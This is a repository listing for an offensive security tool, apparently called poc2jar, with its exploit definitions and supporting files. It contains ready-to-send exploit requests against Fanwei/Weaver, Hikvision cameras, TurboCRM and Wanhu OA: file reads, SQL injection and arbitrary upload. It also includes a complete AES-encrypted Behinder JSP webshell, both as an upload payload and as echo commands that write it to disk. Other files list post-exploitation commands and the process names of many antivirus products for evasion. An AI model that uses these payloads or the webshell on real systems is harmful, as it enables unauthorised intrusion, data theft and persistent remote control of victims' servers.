├── FAQ.md ├── README.md ├── poc ├── fanwei │ ├── WorkflowServiceXml.yml │ ├── fileread1.yml │ ├── fileread2.yml │ └── sqlinject1.yml ├── hikvision │ └── CVE-2017-7921.yml ├── turbocrm │ ├── fileread.yml │ └── getshell.yml └── wanhu │ └── frontgetshell.yml ├── property ├── cmdlists.txt ├── config.properties ├── exetest.txt └── test.txt ├── pythonexp ├── Tomcat │ ├── CNVD-2020-10487-Tomcat-Ajp-lfi.py │ └── CNVD-2020-10487-pro.py ├── poc2jarpiliang.py └── url.txt └── src └── main ├── Main.java ├── Poc2ExpguiController.java ├── ProxyController.java ├── RequestPoc ├── Poclist.java ├── Readfile.java ├── makeRequest.java ├── test.java ├── test3.java ├── test4.java ├── test6test.java └── test7.java ├── finalshelltest ├── Oracledecode.java ├── druid1016after.java ├── druidOutputpassword.java ├── finalshellDecode.java └── seeyonGetpass.java ├── javafxtest └── ListViewTest.java ├── resources ├── config.properties ├── poc2expgui.fxml └── proxy.fxml ├── support ├── ClassDataDesc.java ├── ClassDetails.java ├── ClassField.java ├── Expdecode.java ├── GCMDecode.java └── SerializationDumper.java ├── todo.txt └── util ├── AESDESende.java ├── AEStest.java ├── AEStest2.java ├── CorsJsonp.java ├── StageManager.java ├── Stringtest.java ├── Tasklist.java ├── Usualcmd.java ├── druidgetinformation.java ├── encodeUtil.java ├── extractPath.java ├── fileEncode.java ├── pythonexp.java └── test.java /FAQ.md: -------------------------------------------------------------------------------- 1 | # 1.如何使用? 2 | ### 使用`jdk8u231`及以下jdk版本启动`java -jar poc2jar.jar`,或者当默认jdk为8的时候双击jar即可进行使用 3 | 4 | # 2.有哪些功能? 
5 | - 0x01.保存poc、exp利用(批量) 6 | - 0x02.tasklist进程搜索 7 | - 0x03.常用命令备忘 8 | - 0x04.python脚本利用 *`pocsuite调用`* 9 | - 0x05.Finalshell密码解密、seeyon(致远OA)数据库密码解密、druid密码解密 10 | - 0x06.编码(支持Unicode、URL、base64、Hex(十六进制)、Html、ascii) 11 | - 0x07.Bash、Powershell、Python、Perl命令编码 12 | - 0x08.CS上线命令生成 13 | - 0x09.Druid未授权漏洞利用、跨域漏洞利用(生成POC) 14 | - 0x10.Shiro rememberMe参数解密 15 | - 0x11 加解密模块,支持`AES/DES/DESede`模块 16 | - 0x12 提取路径模块(常用于web.xml的提取、Java Spring未授权的提取) 17 | - 0x13 文件转码 18 | - 0x14 文件写入命令 19 | 20 | 21 | # 3.无法找到主类错误: 找不到或无法加载主类 main.Main 原因: java.lang.NoClassDefFoundError: javafx/application/Application 22 | ### 使用JDK8启动即可 23 | -------------------------------------------------------------------------------- /poc/fanwei/fileread1.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /weaver/org.springframework.web.servlet.ResourceServlet 5 | param: resource=/WEB-INF/prop/weaver.properties 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 11 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 12 | Accept-Encoding: gzip, deflate 13 | Connection: keep-alive 14 | Upgrade-Insecure-Requests: 1 15 | condition: 16 | words: ecology.url 17 | time: 18 | expinformation: 19 | expname: 泛微读取文件-1 20 | expdescribe: 泛微读取文件,/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties -------------------------------------------------------------------------------- /poc/fanwei/fileread2.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /weaver/ln.FileDownload 5 | param: fpath=../ecology/WEB-INF/prop/weaver.properties 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 
(Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 11 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 12 | Accept-Encoding: gzip, deflate 13 | Connection: keep-alive 14 | Upgrade-Insecure-Requests: 1 15 | condition: 16 | words: ecology.url 17 | time: 18 | expinformation: 19 | expname: 泛微读取文件-2 20 | expdescribe: 泛微读取文件,/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties -------------------------------------------------------------------------------- /poc/fanwei/sqlinject1.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /js/hrm/getdata.jsp 5 | param: cmd=forgotPasswordCheck&type=1&loginid=sysadmin111111%27%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0
a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0aunion+select+ascii(1),%272%27,%273%27,%274%27,%275%27,%276%27+where+%27%27=%27 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 11 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 12 | Accept-Encoding: gzip, deflate 13 | Connection: keep-alive 14 | Upgrade-Insecure-Requests: 1 15 | condition: 16 | words: > 17 | "id":49 18 | time: 19 | expinformation: 20 | expname: 泛微注入-2 21 | expdescribe: 泛微注入,/js/hrm/getdata.jsp -------------------------------------------------------------------------------- /poc/hikvision/CVE-2017-7921.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /onvif-http/snapshot 5 | param: auth=YWRtaW46MTEK 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 11 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 12 | Accept-Encoding: gzip, deflate 13 | Connection: keep-alive 14 | Upgrade-Insecure-Requests: 1 15 
| condition: 16 | words: Content-Type:image/jpeg 17 | time: 18 | expinformation: 19 | expname: hikvision 20 | expdescribe: hikvision/CVE-2017-7921.yml,返回的为查看的图像(访问该链接可以直接查看海康威视的监控截图/onvif-http/snapshot?auth=YWRtaW46MTEK;访问该链接可以直接查看海康威视的用户列表/Security/users?auth=YWRtaW46MTEK;访问该链接可以直接获取海康威视的配置文件/System/configurationFile?auth=YWRtaW46MTEK) -------------------------------------------------------------------------------- /poc/turbocrm/fileread.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /ajax/getemaildata.php 5 | param: DontCheckLogin=1&filePath=c:/windows/system32/drivers/etc/hosts 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: text/html,application/xhtml+xml,application/xml;q 11 | Accept-Language: zh-CN,zh;q 12 | Accept-Encoding: gzip, deflate 13 | Upgrade-Insecure-Requests: 1 14 | condition: 15 | words: Copyright 16 | time: 17 | expinformation: 18 | expname: TurboCRM文件读取 19 | expdescribe: TurboCRM文件读取,路径为/ajax/getemaildata.php -------------------------------------------------------------------------------- /poc/turbocrm/getshell.yml: -------------------------------------------------------------------------------- 1 | method: POST 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /ajax/getemaildata.php 5 | param: DontCheckLogin=1 6 | data: | 7 | -----------------------------344329421119612311021814993770 8 | Content-Disposition: form-data; name="file"; filename="shell.php " 9 | Content-Type: text/php 10 | 11 | 14 | 15 | -----------------------------344329421119612311021814993770 16 | Content-Disposition: form-data; name="upload" 17 | 18 | upload 19 | -----------------------------344329421119612311021814993770-- 20 | others: 21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 22 | Accept: 
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 23 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 24 | Accept-Encoding: gzip, deflate 25 | Content-Type: 'multipart/form-data; boundary=---------------------------344329421119612311021814993770' 26 | Content-Length: 386 27 | Connection: keep-alive 28 | Cookie: 'PHPSESSID=c7vlvgf1hhc8uat6r2nnu57333' 29 | Upgrade-Insecure-Requests: 1 30 | condition: 31 | words: tmpfile 32 | time: 33 | expinformation: 34 | expname: TurboCRM任意文件上传 35 | expdescribe: TurboCRM任意文件上传,路径为返回的tmpfile/mh70D7.tmp.mht换为tmpfile/upd70D6.tmp.php -------------------------------------------------------------------------------- /poc/wanhu/frontgetshell.yml: -------------------------------------------------------------------------------- 1 | method: POST 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /defaultroot/officeserverservlet 5 | param: 6 | data: | 7 | DBSTEP V3.0 185 0 611 8 | DBSTEP=REJTVEVQ 9 | OPTION=U0FWRUZJTEU= 10 | RECORDID= 11 | firstFilesize=dHJ1ZQ== 12 | isDoc=dHJ1ZQ== 13 | moduleType=aW5mb3JtYXRpb24= 14 | FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3RhMi5qc3A= 15 | isViewOld=MQ== 16 | 17 | <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%> 18 | <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%> 19 | <%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k); 20 | Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES")); 21 | new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> 22 | others: 23 | User-Agent: Go-http-client/1.1 24 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3' 25 | Accept-Encoding: gzip, deflate 26 | Accept-Language: 
'zh-CN,zh;q=0.9,en;q=0.8' 27 | Connection: close 28 | Upgrade-Insecure-Requests: 1 29 | Content-Length: 790 30 | condition: 31 | words: DBSTEP 32 | time: 33 | expinformation: 34 | expname: 万户getshell 35 | expdescribe: 万户getshell,可能需要代理模式下进行使用,默认冰蝎马,密码为rebeyond -------------------------------------------------------------------------------- /property/cmdlists.txt: -------------------------------------------------------------------------------- 1 | windows查找文件::::dir c:\ /s /b | find "win.ini"、dir c:\ /s /b | find "navicat.exe"、dir c:\ /s /b | find "finalshell.exe" 2 | 3 | linux查找文件::::find / -name passwd 4 | 5 | windows写文件::::echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^> >> C:/x/x.jsp、、echo ^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^> >> C:/x/x.jsp、、echo ^<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> >> C:/x/x.jsp 6 | 7 | linux写文件::::echo xxxxx== |base64 -d > /var/www/html/1.jsp 8 | 9 | 获取操作系统命令::::wmic OS get Caption,CSDVersion,OSArchitecture,Version 10 | 11 | 主机收集::::查看rdp链接记录 cmdkey /list、查看dns记录 ipconfig /displaydns 、查看arp记录 arp -a 12 | 13 | 根据进程查找进程文件::::wmic process where name="xxxx.exe" get processid,executablepath,name、wmic process where name="chrome.exe" list full 14 | 15 | 查看当前系统是否有屏保保护,延迟是多少::::wmic desktop get screensaversecure,screensavertimeout 16 | 17 | 查看当前系统是否是VMWARE::::wmic bios list full | find /i "vmware" 18 | 19 | 显示系统中的曾经连接过的无线密码::::netsh wlan show profiles 20 | 21 | windows常用的系统变量::::查看当前用户目录%HOMEPATH、查看当前目录%CD%、列出用户共享主目录的网络路径%HOMESHARE%、 列出有效的当前登录会话的域名控制器名、列出了可执行文件的搜索路径%Path%、列出了处理器的芯片架构%PROCESSOR_ARCHITECTURE%、列出了Program 
Files文件夹的路径%ProgramFiles%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了包含用户帐号的域的名字%USERDOMAIN%、列出操作系统目录的位置%WINDIR%、返回“所有用户”配置文件的位置%ALLUSERSPROFILE%、返回处理器数目%NUMBER_OF_PROCESSORS% 22 | -------------------------------------------------------------------------------- /property/config.properties: -------------------------------------------------------------------------------- 1 | python2path=python 2 | python3path=python3 3 | -------------------------------------------------------------------------------- /property/exetest.txt: -------------------------------------------------------------------------------- 1 | "360tray.exe": "360安全卫士-实时保护", 2 | "360safe.exe": "360安全卫士-主程序", 3 | "ZhuDongFangYu.exe": "360安全卫士-主动防御", 4 | "360sd.exe": "360杀毒", 5 | "a2guard.exe": "a-squared杀毒", 6 | "ad-watch.exe": "Lavasoft杀毒", 7 | "cleaner8.exe": "The Cleaner杀毒", 8 | "vba32lder.exe": "vb32杀毒", 9 | "MongoosaGUI.exe": "Mongoosa杀毒", 10 | "CorantiControlCenter32.exe": "Coranti2012杀毒", 11 | "F-PROT.exe": "F-Prot AntiVirus", 12 | "CMCTrayIcon.exe": "CMC杀毒", 13 | "K7TSecurity.exe": "K7杀毒", 14 | "UnThreat.exe": "UnThreat杀毒", 15 | "CKSoftShiedAntivirus4.exe": "Shield Antivirus杀毒", 16 | "AVWatchService.exe": "VIRUSfighter杀毒", 17 | "ArcaTasksService.exe": "ArcaVir杀毒", 18 | "iptray.exe": "Immunet杀毒", 19 | "PSafeSysTray.exe": "PSafe杀毒", 20 | "nspupsvc.exe": "nProtect杀毒", 21 | "SpywareTerminatorShield.exe": "SpywareTerminator反间谍软件", 22 | "BKavService.exe": "Bkav杀毒", 23 | "MsMpEng.exe": "Microsoft Security Essentials", 24 | "SBAMSvc.exe": "VIPRE", 25 | "ccSvcHst.exe": "Norton杀毒", 26 | "f-secure.exe": "冰岛", 27 | "avp.exe": "Kaspersky", 28 | "KvMonXP.exe": "江民杀毒", 29 | "RavMonD.exe": "瑞星杀毒", 30 | "Mcshield.exe": "McAfee", 31 | "Tbmon.exe": "McAfee", 32 | "Frameworkservice.exe": "McAfee", 33 | "egui.exe": "ESET NOD32", 34 | "ekrn.exe": "ESET NOD32", 35 | "eguiProxy.exe": "ESET NOD32", 36 | "kxetray.exe": "金山毒霸", 37 | "knsdtray.exe": "可牛杀毒", 38 | "TMBMSRV.exe": "趋势杀毒", 
39 | "avcenter.exe": "Avira(小红伞)", 40 | "avguard.exe": "Avira(小红伞)", 41 | "avgnt.exe": "Avira(小红伞)", 42 | "sched.exe": "Avira(小红伞)", 43 | "ashDisp.exe": "Avast网络安全", 44 | "rtvscan.exe": "诺顿杀毒", 45 | "ccapp.exe": "SymantecNorton", 46 | "NPFMntor.exe": "Norton杀毒软件", 47 | "ccSetMgr.exe": "赛门铁克", 48 | "ccRegVfy.exe": "Norton杀毒软件", 49 | "ksafe.exe": "金山卫士", 50 | "QQPCRTP.exe": "QQ电脑管家", 51 | "avgwdsvc.exe": "AVG杀毒", 52 | "QUHLPSVC.exe": "QUICK HEAL杀毒", 53 | "mssecess.exe": "微软杀毒", 54 | "SavProgress.exe": "Sophos杀毒", 55 | "SophosUI.exe": "Sophos杀毒", 56 | "SophosFS.exe": "Sophos杀毒", 57 | "SophosHealth.exe": "Sophos杀毒", 58 | "SophosSafestore64.exe": "Sophos杀毒", 59 | "SophosCleanM.exe": "Sophos杀毒", 60 | "fsavgui.exe": "F-Secure杀毒", 61 | "vsserv.exe": "比特梵德", 62 | "remupd.exe": "熊猫卫士", 63 | "FortiTray.exe": "飞塔", 64 | "safedog.exe": "安全狗", 65 | "parmor.exe": "木马克星", 66 | "Iparmor.exe.exe": "木马克星", 67 | "beikesan.exe": "贝壳云安全", 68 | "KSWebShield.exe": "金山网盾", 69 | "TrojanHunter.exe": "木马猎手", 70 | "GG.exe": "巨盾网游安全盾", 71 | "adam.exe": "绿鹰安全精灵", 72 | "AST.exe": "超级巡警", 73 | "ananwidget.exe": "墨者安全专家", 74 | "AVK.exe": "AntiVirusKit", 75 | "avg.exe": "AVG Anti-Virus", 76 | "spidernt.exe": "Dr.web", 77 | "avgaurd.exe": "Avira Antivir", 78 | "vsmon.exe": "Zone Alarm", 79 | "cpf.exe": "Comodo", 80 | "outpost.exe": "Outpost Firewall", 81 | "rfwmain.exe": "瑞星防火墙", 82 | "kpfwtray.exe": "金山网镖", 83 | "FYFireWall.exe": "风云防火墙", 84 | "MPMon.exe": "微点主动防御", 85 | "pfw.exe": "天网防火墙", 86 | "BaiduSdSvc.exe": "百度杀毒-服务进程", 87 | "BaiduSdTray.exe": "百度杀毒-托盘进程", 88 | "BaiduSd.exe": "百度杀毒-主程序", 89 | "SafeDogGuardCenter.exe": "安全狗", 90 | "safedogupdatecenter.exe": "安全狗", 91 | "safedogguardcenter.exe": "安全狗", 92 | "SafeDogSiteIIS.exe": "安全狗", 93 | "SafeDogTray.exe": "安全狗", 94 | "SafeDogServerUI.exe": "安全狗", 95 | "D_Safe_Manage.exe": "D盾", 96 | "d_manage.exe": "D盾", 97 | "yunsuo_agent_service.exe": "云锁", 98 | "yunsuo_agent_daemon.exe": "云锁", 99 | "HwsPanel.exe": "护卫神", 100 | "hws_ui.exe": "护卫神", 101 | 
"hws.exe": "护卫神", 102 | "hwsd.exe": "护卫神", 103 | "hipstray.exe": "火绒", 104 | "wsctrl.exe": "火绒", 105 | "usysdiag.exe": "火绒", 106 | "SPHINX.exe": "SPHINX防火墙", 107 | "bddownloader.exe": "百度卫士", 108 | "baiduansvx.exe": "百度卫士-主进程", 109 | "AvastUI.exe": "Avast!5主程序", 110 | "emet_agent.exe": "EMET", 111 | "emet_service.exe": "EMET", 112 | "firesvc.exe": "McAfee", 113 | "firetray.exe": "McAfee", 114 | "hipsvc.exe": "McAfee", 115 | "mfevtps.exe": "McAfee", 116 | "mcafeefire.exe": "McAfee", 117 | "scan32.exe": "McAfee", 118 | "shstat.exe": "McAfee", 119 | "vstskmgr.exe": "McAfee", 120 | "engineserver.exe": "McAfee", 121 | "mfeann.exe": "McAfee", 122 | "mcscript.exe": "McAfee", 123 | "updaterui.exe": "McAfee", 124 | "udaterui.exe": "McAfee", 125 | "naprdmgr.exe": "McAfee", 126 | "cleanup.exe": "McAfee", 127 | "cmdagent.exe": "McAfee", 128 | "frminst.exe": "McAfee", 129 | "mcscript_inuse.exe": "McAfee", 130 | "mctray.exe": "McAfee", 131 | "_avp32.exe": "卡巴斯基", 132 | "_avpcc.exe": "卡巴斯基", 133 | "_avpm.exe": "卡巴斯基", 134 | "aAvgApi.exe": "AVG", 135 | "ackwin32.exe": "已知杀软进程,名称暂未收录", 136 | "alertsvc.exe": "Norton AntiVirus", 137 | "alogserv.exe": "McAfee VirusScan", 138 | "anti-trojan.exe": "Anti-Trojan Elite", 139 | "arr.exe": "Application Request Route", 140 | "atguard.exe": "AntiVir", 141 | "atupdater.exe": "已知杀软进程,名称暂未收录", 142 | "atwatch.exe": "Mustek", 143 | "au.exe": "NSIS", 144 | "aupdate.exe": "Symantec", 145 | "auto-protect.nav80try.exe": "已知杀软进程,名称暂未收录", 146 | "autodown.exe": "AntiVirus AutoUpdater", 147 | "avconsol.exe": "McAfee", 148 | "avgcc32.exe": "AVG", 149 | "avgctrl.exe": "AVG", 150 | "avgemc.exe": "AVG", 151 | "avgrsx.exe": "AVG", 152 | "avgserv.exe": "AVG", 153 | "avgserv9.exe": "AVG", 154 | "avgw.exe": "AVG", 155 | "avkpop.exe": "G DATA SOFTWARE AG", 156 | "avkserv.exe": "G DATA SOFTWARE AG", 157 | "avkservice.exe": "G DATA SOFTWARE AG", 158 | "avkwctl9.exe": "G DATA SOFTWARE AG", 159 | "avltmain.exe": "Panda Software Aplication", 160 | "avnt.exe": "H+BEDV 
Datentechnik GmbH", 161 | "avp32.exe": "Kaspersky Anti-Virus", 162 | "avpcc.exe": " Kaspersky AntiVirus", 163 | "avpdos32.exe": " Kaspersky AntiVirus", 164 | "avpm.exe": " Kaspersky AntiVirus", 165 | "avptc32.exe": " Kaspersky AntiVirus", 166 | "avpupd.exe": " Kaspersky AntiVirus", 167 | "avsynmgr.exe": "McAfee", 168 | "avwin.exe": " H+BEDV", 169 | "bargains.exe": "Exact Advertising SpyWare", 170 | "beagle.exe": "Avast", 171 | "blackd.exe": "BlackICE", 172 | "blackice.exe": "BlackICE", 173 | "blink.exe": "micromedia", 174 | "blss.exe": "CBlaster", 175 | "bootwarn.exe": "Symantec", 176 | "bpc.exe": "Grokster", 177 | "brasil.exe": "Exact Advertising", 178 | "ccevtmgr.exe": "Norton Internet Security", 179 | "cdp.exe": "CyberLink Corp.", 180 | "cfd.exe": "Motive Communications", 181 | "cfgwiz.exe": " Norton AntiVirus", 182 | "claw95.exe": "已知杀软进程,名称暂未收录", 183 | "claw95cf.exe": "已知杀软进程,名称暂未收录", 184 | "clean.exe": "windows流氓软件清理大师", 185 | "cleaner.exe": "windows流氓软件清理大师", 186 | "cleaner3.exe": "windows流氓软件清理大师", 187 | "cleanpc.exe": "windows流氓软件清理大师", 188 | "cpd.exe": "McAfee", 189 | "ctrl.exe": "已知杀软进程,名称暂未收录", 190 | "cv.exe": "已知杀软进程,名称暂未收录", 191 | "defalert.exe": "Symantec", 192 | "defscangui.exe": "Symantec", 193 | "defwatch.exe": "Norton Antivirus", 194 | "doors.exe": "已知杀软进程,名称暂未收录", 195 | "dpf.exe": "已知杀软进程,名称暂未收录", 196 | "dpps2.exe": "PanicWare", 197 | "dssagent.exe": "Broderbund", 198 | "ecengine.exe": "已知杀软进程,名称暂未收录", 199 | "emsw.exe": "Alset Inc", 200 | "ent.exe": "已知杀软进程,名称暂未收录", 201 | "espwatch.exe": "已知杀软进程,名称暂未收录", 202 | "ethereal.exe": "RationalClearCase", 203 | "exe.avxw.exe": "已知杀软进程,名称暂未收录", 204 | "expert.exe": "已知杀软进程,名称暂未收录", 205 | "f-prot95.exe": "已知杀软进程,名称暂未收录", 206 | "fameh32.exe": "F-Secure", 207 | "fast.exe": " FastUsr", 208 | "fch32.exe": "F-Secure", 209 | "fih32.exe": "F-Secure", 210 | "findviru.exe": "F-Secure", 211 | "firewall.exe": "AshampooSoftware", 212 | "fnrb32.exe": "F-Secure", 213 | "fp-win.exe": " F-Prot Antivirus OnDemand", 214 | 
"fsaa.exe": "F-Secure", 215 | "fsav.exe": "F-Secure", 216 | "fsav32.exe": "F-Secure", 217 | "fsav530stbyb.exe": "F-Secure", 218 | "fsav530wtbyb.exe": "F-Secure", 219 | "fsav95.exe": "F-Secure", 220 | "fsgk32.exe": "F-Secure", 221 | "fsm32.exe": "F-Secure", 222 | "fsma32.exe": "F-Secure", 223 | "fsmb32.exe": "F-Secure", 224 | "gbmenu.exe": "已知杀软进程,名称暂未收录", 225 | "guard.exe": "ewido", 226 | "guarddog.exe": "ewido", 227 | "htlog.exe": "已知杀软进程,名称暂未收录", 228 | "htpatch.exe": "Silicon Integrated Systems Corporation", 229 | "hwpe.exe": "已知杀软进程,名称暂未收录", 230 | "iamapp.exe": "Symantec", 231 | "iamserv.exe": "Symantec", 232 | "iamstats.exe": "Symantec", 233 | "iedriver.exe": " Urlblaze.com", 234 | "iface.exe": "Panda Antivirus Module", 235 | "infus.exe": "Infus Dialer", 236 | "infwin.exe": "Msviewparasite", 237 | "intdel.exe": "Inet Delivery", 238 | "intren.exe": "已知杀软进程,名称暂未收录", 239 | "jammer.exe": "已知杀软进程,名称暂未收录", 240 | "kavpf.exe": "Kaspersky", 241 | "kazza.exe": "Kaspersky", 242 | "keenvalue.exe": "EUNIVERSE INC", 243 | "launcher.exe": "Intercort Systems", 244 | "ldpro.exe": "已知杀软进程,名称暂未收录", 245 | "ldscan.exe": "Windows Trojans Inspector", 246 | "localnet.exe": "已知杀软进程,名称暂未收录", 247 | "luall.exe": "Symantec", 248 | "luau.exe": "Symantec", 249 | "lucomserver.exe": "Norton", 250 | "mcagent.exe": "McAfee", 251 | "mcmnhdlr.exe": "McAfee", 252 | "mctool.exe": "McAfee", 253 | "mcupdate.exe": "McAfee", 254 | "mcvsrte.exe": "McAfee", 255 | "mcvsshld.exe": "McAfee", 256 | "mfin32.exe": "MyFreeInternetUpdate", 257 | "mfw2en.exe": "MyFreeInternetUpdate", 258 | "mfweng3.02d30.exe": "MyFreeInternetUpdate", 259 | "mgavrtcl.exe": "McAfee", 260 | "mgavrte.exe": "McAfee", 261 | "mghtml.exe": "McAfee", 262 | "mgui.exe": "BullGuard", 263 | "minilog.exe": "Zone Labs Inc", 264 | "mmod.exe": "EzulaInc", 265 | "mostat.exe": "WurldMediaInc", 266 | "mpfagent.exe": "McAfee", 267 | "mpfservice.exe": "McAfee", 268 | "mpftray.exe": "McAfee", 269 | "mscache.exe": "Integrated Search Technologies Spyware", 
